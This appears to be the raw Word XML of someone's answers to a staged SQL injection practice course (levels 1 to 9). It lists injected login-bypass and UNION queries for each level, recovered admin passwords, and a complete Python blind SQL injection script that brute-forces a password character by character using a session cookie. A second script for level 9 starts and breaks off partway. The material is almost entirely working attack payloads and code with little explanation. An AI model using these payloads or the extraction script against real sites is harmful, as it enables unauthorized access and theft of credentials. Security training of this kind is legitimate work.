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D03B" w14:textId="2F6CC7BF" w:rsidR="008D4961" w:rsidRDefault="00321257">
      <w:r>
        <w:t>Lv1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EB3F2EF" w14:textId="77777777" w:rsidR="008A3438" w:rsidRDefault="008A3438">
      <w:r w:rsidRPr="008A3438">
        <w:t>select * from tb_lv1 where id='admin'#' and pw=''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BF9D871" w14:textId="1D5CDDC1" w:rsidR="00321257" w:rsidRDefault="00321257">
      <w:r>
        <w:t>Lv2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26630B10" w14:textId="0AA7051B" w:rsidR="008A3438" w:rsidRDefault="008A3438">
      <w:r w:rsidRPr="008A3438">
        <w:t>select * from tb_lv2 where id='guest' and pw='' or id='admin' and '1'='1'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="447B88B7" w14:textId="2DA38BF6" w:rsidR="008A3438" w:rsidRDefault="008A3438">
      <w:r>
        <w:t>Lv3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1149C804" w14:textId="6B8E358F" w:rsidR="008A3438" w:rsidRDefault="00150DF4">
      <w:r w:rsidRPr="00150DF4">
        <w:t>select * from tb_lv3 where id='guest' and seq=0 or id=0x61646d696e and true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49A99CA5" w14:textId="283EBBF1" w:rsidR="00150DF4" w:rsidRDefault="00150DF4">
      <w:r>
        <w:t>Lv4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B950CCE" w14:textId="7B2A4EEE" w:rsidR="00150DF4" w:rsidRDefault="00150DF4">
      <w:r w:rsidRPr="00150DF4">
        <w:t>select * from tb_lv4 where id='guest' and pw='1' || id='admin' &amp;&amp; true#'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2122F653" w14:textId="5BEFD3DB" w:rsidR="00150DF4" w:rsidRDefault="00A10E04">
      <w:r>
        <w:t>Lv5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A9F54CC" w14:textId="7E2B3679" w:rsidR="00A10E04" w:rsidRDefault="00A10E04">
      <w:r w:rsidRPr="00A10E04">
        <w:t>select * from tb_lv5 where id='guest' and pw=''or(id='admin</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A10E04">
        <w:t>')and</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A10E04">
        <w:t>(true)#'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AD5C7A7" w14:textId="7D35A6E9" w:rsidR="00A10E04" w:rsidRDefault="005A54E6">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>L</w:t>
      </w:r>
      <w:r>
        <w:t>v6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E51460A" w14:textId="155C5BCB" w:rsidR="005A54E6" w:rsidRDefault="005A54E6">
      <w:r w:rsidRPr="005A54E6">
        <w:t>select * from tb_lv6 where id='admin'#' and pw=''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39DE5208" w14:textId="77777777" w:rsidR="00590641" w:rsidRDefault="00590641" w:rsidP="00590641">
      <w:pPr>
        <w:widowControl/>
        <w:wordWrap/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="50FC1DC8" w14:textId="7781D30B" w:rsidR="001C7864" w:rsidRDefault="00590641" w:rsidP="00BB59C1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v7 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E1AA8F8" w14:textId="77777777" w:rsidR="00BB59C1" w:rsidRDefault="00BB59C1" w:rsidP="00590641">
      <w:r w:rsidRPr="00BB59C1">
        <w:t>select id, pw from tb_lv7 where id like '%admin%' union select pw, id from tb_lv7#%'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3450EA98" w14:textId="58557BED" w:rsidR="00590641" w:rsidRDefault="00590641" w:rsidP="00590641">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>L</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">v7 </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>password :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BB59C1" w:rsidRPr="00BB59C1">
        <w:t>passwd@dm1n</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04A809B3" w14:textId="4A0D339C" w:rsidR="00590641" w:rsidRDefault="00590641" w:rsidP="00590641">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>L</w:t>
      </w:r>
      <w:r>
        <w:t>v8</w:t>
      </w:r>
      <w:r w:rsidR="00BB59C1">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BB59C1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="00BB59C1">
        <w:t>ource</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FACEB17" w14:textId="77777777" w:rsidR="00BB59C1" w:rsidRDefault="00BB59C1" w:rsidP="00BB59C1">
      <w:r>
        <w:t xml:space="preserve">import </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>urllib.request</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> as req</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77C3802F" w14:textId="77777777" w:rsidR="00BB59C1" w:rsidRDefault="00BB59C1" w:rsidP="00BB59C1">
      <w:r>
        <w:t>import re</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22197912" w14:textId="77777777" w:rsidR="00BB59C1" w:rsidRDefault="00BB59C1" w:rsidP="00BB59C1">
      <w:r>
        <w:t>from urllib import parse</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="464673E4" w14:textId="77777777" w:rsidR="00BB59C1" w:rsidRDefault="00BB59C1" w:rsidP="00BB59C1">
      <w:r>
        <w:t>import time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17D8CF31" w14:textId="77777777" w:rsidR="00BB59C1" w:rsidRDefault="00BB59C1" w:rsidP="00BB59C1"/>
    <w:p w14:paraId="73914AB6" w14:textId="65468751" w:rsidR="00BB59C1" w:rsidRDefault="00BB59C1" w:rsidP="00BB59C1">
      <w:r>
        <w:t>lvurl = "*/q/lv8.php?"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27EC2600" w14:textId="77777777" w:rsidR="00BB59C1" w:rsidRDefault="00BB59C1" w:rsidP="00BB59C1">
      <w:r>
        <w:t>cookie = "PHPSESSID=*"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="297A8779" w14:textId="77777777" w:rsidR="00BB59C1" w:rsidRDefault="00BB59C1" w:rsidP="00BB59C1"/>
    <w:p w14:paraId="5CABECA5" w14:textId="77777777" w:rsidR="00BB59C1" w:rsidRDefault="00BB59C1" w:rsidP="00BB59C1">
      <w:r>
        <w:t>length = 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AA25EEA" w14:textId="77777777" w:rsidR="00BB59C1" w:rsidRDefault="00BB59C1" w:rsidP="00BB59C1">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>while (1):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52202334" w14:textId="77777777" w:rsidR="00BB59C1" w:rsidRDefault="00BB59C1" w:rsidP="00BB59C1">
      <w:r>
        <w:t xml:space="preserve">    length = length + 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35F366D2" w14:textId="77777777" w:rsidR="00BB59C1" w:rsidRDefault="00BB59C1" w:rsidP="00BB59C1">
      <w:r>
        <w:t xml:space="preserve">    query = {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55BC5377" w14:textId="77777777" w:rsidR="00BB59C1" w:rsidRDefault="00BB59C1" w:rsidP="00BB59C1">
      <w:r>
        <w:t xml:space="preserve">        'search</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>' :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> """admin%' having length(pw) = """ + str(length) + """#"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34DAD984" w14:textId="77777777" w:rsidR="00BB59C1" w:rsidRDefault="00BB59C1" w:rsidP="00BB59C1">
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AD77C43" w14:textId="77777777" w:rsidR="00BB59C1" w:rsidRDefault="00BB59C1" w:rsidP="00BB59C1">
      <w:r>
        <w:t xml:space="preserve">    param = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>parse.urlencode</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>(query, encoding = 'UTF-8')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47C6F1FA" w14:textId="77777777" w:rsidR="00BB59C1" w:rsidRDefault="00BB59C1" w:rsidP="00BB59C1">
      <w:r>
        <w:t xml:space="preserve">    Myurl = lvurl+param</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="363DE348" w14:textId="77777777" w:rsidR="00BB59C1" w:rsidRDefault="00BB59C1" w:rsidP="00BB59C1">
      <w:r>
        <w:t xml:space="preserve">    Myreq = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>req.Request</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>(Myurl)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F45045D" w14:textId="77777777" w:rsidR="00BB59C1" w:rsidRDefault="00BB59C1" w:rsidP="00BB59C1">
      <w:r>
        <w:t xml:space="preserve">    Myreq.add_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>header(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>'cookie', cookie)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15C5615E" w14:textId="77777777" w:rsidR="00BB59C1" w:rsidRDefault="00BB59C1" w:rsidP="00BB59C1">
      <w:r>
        <w:t xml:space="preserve">    Myres = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>req.urlopen</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>(Myreq)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5035171C" w14:textId="77777777" w:rsidR="00BB59C1" w:rsidRDefault="00BB59C1" w:rsidP="00BB59C1">
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>time.sleep</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>(0.01)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FC45D59" w14:textId="77777777" w:rsidR="00BB59C1" w:rsidRDefault="00BB59C1" w:rsidP="00BB59C1">
      <w:r>
        <w:t xml:space="preserve">    urllist = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>list(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>Myres)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B3DE072" w14:textId="77777777" w:rsidR="00BB59C1" w:rsidRDefault="00BB59C1" w:rsidP="00BB59C1">
      <w:r>
        <w:t xml:space="preserve">    beforecheck = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>re.compile</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>("[*][I][D][*]")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FD84956" w14:textId="77777777" w:rsidR="00BB59C1" w:rsidRDefault="00BB59C1" w:rsidP="00BB59C1">
      <w:r>
        <w:t xml:space="preserve">    index = 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47822C80" w14:textId="77777777" w:rsidR="00BB59C1" w:rsidRDefault="00BB59C1" w:rsidP="00BB59C1">
      <w:r>
        <w:t xml:space="preserve">    for i in range(len(urllist)-1):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67F2168B" w14:textId="77777777" w:rsidR="00BB59C1" w:rsidRDefault="00BB59C1" w:rsidP="00BB59C1">
      <w:r>
        <w:t xml:space="preserve">        if (</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>beforecheck.search</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>(urllist[i].decode('utf-8'))):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D57CFDA" w14:textId="77777777" w:rsidR="00BB59C1" w:rsidRDefault="00BB59C1" w:rsidP="00BB59C1">
      <w:r>
        <w:t xml:space="preserve">            index = i</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CCDB39D" w14:textId="77777777" w:rsidR="00BB59C1" w:rsidRDefault="00BB59C1" w:rsidP="00BB59C1">
      <w:r>
        <w:t xml:space="preserve">    idcheck = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>re.compile</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>("[a][d][m][i][n]")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A706A92" w14:textId="77777777" w:rsidR="00BB59C1" w:rsidRDefault="00BB59C1" w:rsidP="00BB59C1">
      <w:r>
        <w:t xml:space="preserve">    if(</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>idcheck.search</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">(urllist[index+1].decode("utf-8"))):      </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05B54965" w14:textId="77777777" w:rsidR="00BB59C1" w:rsidRDefault="00BB59C1" w:rsidP="00BB59C1">
      <w:r>
        <w:t xml:space="preserve">        break</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16CD5FD1" w14:textId="77777777" w:rsidR="00BB59C1" w:rsidRDefault="00BB59C1" w:rsidP="00BB59C1">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>print(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>"length : {}".format(length))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FE18A46" w14:textId="77777777" w:rsidR="00BB59C1" w:rsidRDefault="00BB59C1" w:rsidP="00BB59C1"/>
    <w:p w14:paraId="6A8285DB" w14:textId="77777777" w:rsidR="00BB59C1" w:rsidRDefault="00BB59C1" w:rsidP="00BB59C1"/>
    <w:p w14:paraId="2C560803" w14:textId="77777777" w:rsidR="00BB59C1" w:rsidRDefault="00BB59C1" w:rsidP="00BB59C1">
      <w:r>
        <w:t>password = []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B7E32AD" w14:textId="77777777" w:rsidR="00BB59C1" w:rsidRDefault="00BB59C1" w:rsidP="00BB59C1">
      <w:r>
        <w:t>for k in range(length):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="336B2403" w14:textId="77777777" w:rsidR="00BB59C1" w:rsidRDefault="00BB59C1" w:rsidP="00BB59C1">
      <w:r>
        <w:t xml:space="preserve">    for j in </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>range(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>128):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30516906" w14:textId="77777777" w:rsidR="00BB59C1" w:rsidRDefault="00BB59C1" w:rsidP="00BB59C1">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        val = chr(j)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E36CE2B" w14:textId="77777777" w:rsidR="00BB59C1" w:rsidRDefault="00BB59C1" w:rsidP="00BB59C1">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>if(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>val == '&amp;' or val == '|' or val == '_'):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="579009EE" w14:textId="77777777" w:rsidR="00BB59C1" w:rsidRDefault="00BB59C1" w:rsidP="00BB59C1">
      <w:r>
        <w:t xml:space="preserve">            continue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BD9E626" w14:textId="77777777" w:rsidR="00BB59C1" w:rsidRDefault="00BB59C1" w:rsidP="00BB59C1">
      <w:r>
        <w:t xml:space="preserve">        query = {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="015F0EDC" w14:textId="77777777" w:rsidR="00BB59C1" w:rsidRDefault="00BB59C1" w:rsidP="00BB59C1">
      <w:r>
        <w:t xml:space="preserve">            'search</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>' :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> """admin%' having substr(pw,"""+str(k+1)+""",1) = '""" + val + """'#"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36C9B33D" w14:textId="77777777" w:rsidR="00BB59C1" w:rsidRDefault="00BB59C1" w:rsidP="00BB59C1">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72EDF02B" w14:textId="77777777" w:rsidR="00BB59C1" w:rsidRDefault="00BB59C1" w:rsidP="00BB59C1">
      <w:r>
        <w:t xml:space="preserve">        param = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>parse.urlencode</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>(query, encoding = 'UTF-8')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D239217" w14:textId="77777777" w:rsidR="00BB59C1" w:rsidRDefault="00BB59C1" w:rsidP="00BB59C1">
      <w:r>
        <w:t xml:space="preserve">        Myurl = lvurl+param</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48A8488F" w14:textId="77777777" w:rsidR="00BB59C1" w:rsidRDefault="00BB59C1" w:rsidP="00BB59C1">
      <w:r>
        <w:t xml:space="preserve">        Myreq = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>req.Request</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>(Myurl)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AF4655F" w14:textId="77777777" w:rsidR="00BB59C1" w:rsidRDefault="00BB59C1" w:rsidP="00BB59C1">
      <w:r>
        <w:t xml:space="preserve">        Myreq.add_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>header(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>'cookie', cookie)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CE1DC09" w14:textId="77777777" w:rsidR="00BB59C1" w:rsidRDefault="00BB59C1" w:rsidP="00BB59C1">
      <w:r>
        <w:t xml:space="preserve">        Myres = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>req.urlopen</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>(Myreq)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FC2F5BF" w14:textId="77777777" w:rsidR="00BB59C1" w:rsidRDefault="00BB59C1" w:rsidP="00BB59C1">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>time.sleep</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>(0.01)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="055A8E3C" w14:textId="77777777" w:rsidR="00BB59C1" w:rsidRDefault="00BB59C1" w:rsidP="00BB59C1">
      <w:r>
        <w:t xml:space="preserve">        urllist = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>list(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>Myres)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E0F5235" w14:textId="77777777" w:rsidR="00BB59C1" w:rsidRDefault="00BB59C1" w:rsidP="00BB59C1">
      <w:r>
        <w:t xml:space="preserve">        beforecheck = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>re.compile</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>("[*][*][I][D][*]")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CD1C739" w14:textId="77777777" w:rsidR="00BB59C1" w:rsidRDefault="00BB59C1" w:rsidP="00BB59C1">
      <w:r>
        <w:t xml:space="preserve">        index = 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06D494E0" w14:textId="77777777" w:rsidR="00BB59C1" w:rsidRDefault="00BB59C1" w:rsidP="00BB59C1">
      <w:r>
        <w:t xml:space="preserve">        for i in range(len(urllist)-1):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24600D93" w14:textId="77777777" w:rsidR="00BB59C1" w:rsidRDefault="00BB59C1" w:rsidP="00BB59C1">
      <w:r>
        <w:t xml:space="preserve">            if (</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>beforecheck.search</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>(urllist[i].decode('utf-8'))):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13F57CB9" w14:textId="77777777" w:rsidR="00BB59C1" w:rsidRDefault="00BB59C1" w:rsidP="00BB59C1">
      <w:r>
        <w:t xml:space="preserve">                index = i</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BBE8126" w14:textId="77777777" w:rsidR="00BB59C1" w:rsidRDefault="00BB59C1" w:rsidP="00BB59C1">
      <w:r>
        <w:t xml:space="preserve">                break</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="666D74A1" w14:textId="77777777" w:rsidR="00BB59C1" w:rsidRDefault="00BB59C1" w:rsidP="00BB59C1">
      <w:r>
        <w:t xml:space="preserve">        idcheck = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>re.compile</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>("[a][d][m][i][n]")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10203EED" w14:textId="77777777" w:rsidR="00BB59C1" w:rsidRDefault="00BB59C1" w:rsidP="00BB59C1">
      <w:r>
        <w:t xml:space="preserve">        if(</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>idcheck.search</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>(urllist[index+1].decode('utf-8'))):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="401AB5EE" w14:textId="77777777" w:rsidR="00BB59C1" w:rsidRDefault="00BB59C1" w:rsidP="00BB59C1">
      <w:r>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>password.append</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>(val)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BC24F44" w14:textId="77777777" w:rsidR="00BB59C1" w:rsidRDefault="00BB59C1" w:rsidP="00BB59C1">
      <w:r>
        <w:t xml:space="preserve">            print ("</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>".join</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>(password))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4867BB72" w14:textId="77777777" w:rsidR="00BB59C1" w:rsidRDefault="00BB59C1" w:rsidP="00BB59C1">
      <w:r>
        <w:t xml:space="preserve">            break</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E8ED2CA" w14:textId="77777777" w:rsidR="00BB59C1" w:rsidRDefault="00BB59C1" w:rsidP="00BB59C1">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>print(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>"password : ", end='')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58396912" w14:textId="77777777" w:rsidR="00BB59C1" w:rsidRDefault="00BB59C1" w:rsidP="00BB59C1">
      <w:r>
        <w:t>print("</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>".join</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>(password))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="042E1232" w14:textId="4BACB6A1" w:rsidR="002D24A3" w:rsidRDefault="002D24A3" w:rsidP="00590641">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>L</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">v8 </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>password :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D24A3">
        <w:t>3P9W1D</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="138B1F84" w14:textId="7AC299C4" w:rsidR="006E1EA1" w:rsidRDefault="006E1EA1" w:rsidP="00590641">
      <w:r>
        <w:t xml:space="preserve">Lv9 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>소스</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1066F3F5" w14:textId="77777777" w:rsidR="006E1EA1" w:rsidRDefault="006E1EA1" w:rsidP="006E1EA1">
      <w:r>
        <w:t xml:space="preserve">import </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>urllib.request</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> as req</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58A9C08A" w14:textId="77777777" w:rsidR="006E1EA1" w:rsidRDefault="006E1EA1" w:rsidP="006E1EA1">
      <w:r>
        <w:t>import re</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="034C535D" w14:textId="77777777" w:rsidR="006E1EA1" w:rsidRDefault="006E1EA1" w:rsidP="006E1EA1">
      <w:r>
        <w:t>from urllib import parse</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2226D979" w14:textId="77777777" w:rsidR="006E1EA1" w:rsidRDefault="006E1EA1" w:rsidP="006E1EA1">
      <w:r>
        <w:t>import time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4771C3C3" w14:textId="77777777" w:rsidR="006E1EA1" w:rsidRDefault="006E1EA1" w:rsidP="006E1EA1"/>
    <w:p w14:paraId="726FE149" w14:textId="77777777" w:rsidR="006E1EA1" w:rsidRDefault="006E1EA1" w:rsidP="006E1EA1">
      <w:r>
        <w:t>lvurl = "*/q/lv9.php?"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4922985E" w14:textId="77777777" w:rsidR="006E1EA1" w:rsidRDefault="006E1EA1" w:rsidP="006E1EA1">
      <w:r>
        <w:t>cookie = "PHPSESSID=*"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F3C28E3" w14:textId="77777777" w:rsidR="006E1EA1" w:rsidRDefault="006E1EA1" w:rsidP="006E1EA1"/>
    <w:p w14:paraId="51F96508" w14:textId="77777777" w:rsidR="006E1EA1" w:rsidRDefault="006E1EA1" w:rsidP="006E1EA1">
      <w:r>
        <w:t>length = 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67A5B234" w14:textId="77777777" w:rsidR="006E1EA1" w:rsidRDefault="006E1EA1" w:rsidP="006E1EA1">
      <w:r>
        <w:t>while (1):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AB26DF9" w14:textId="77777777" w:rsidR="006E1EA1" w:rsidRDefault="006E1EA1" w:rsidP="006E1EA1">
      <w:r>
        <w:t xml:space="preserve">    length = length + 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A31D7AE" w14:textId="77777777" w:rsidR="006E1EA1" w:rsidRDefault="006E1EA1" w:rsidP="006E1EA1">
      <w:r>
        <w:t xml:space="preserve">    query = {</w:t>
      </w:r>
    </w:p>
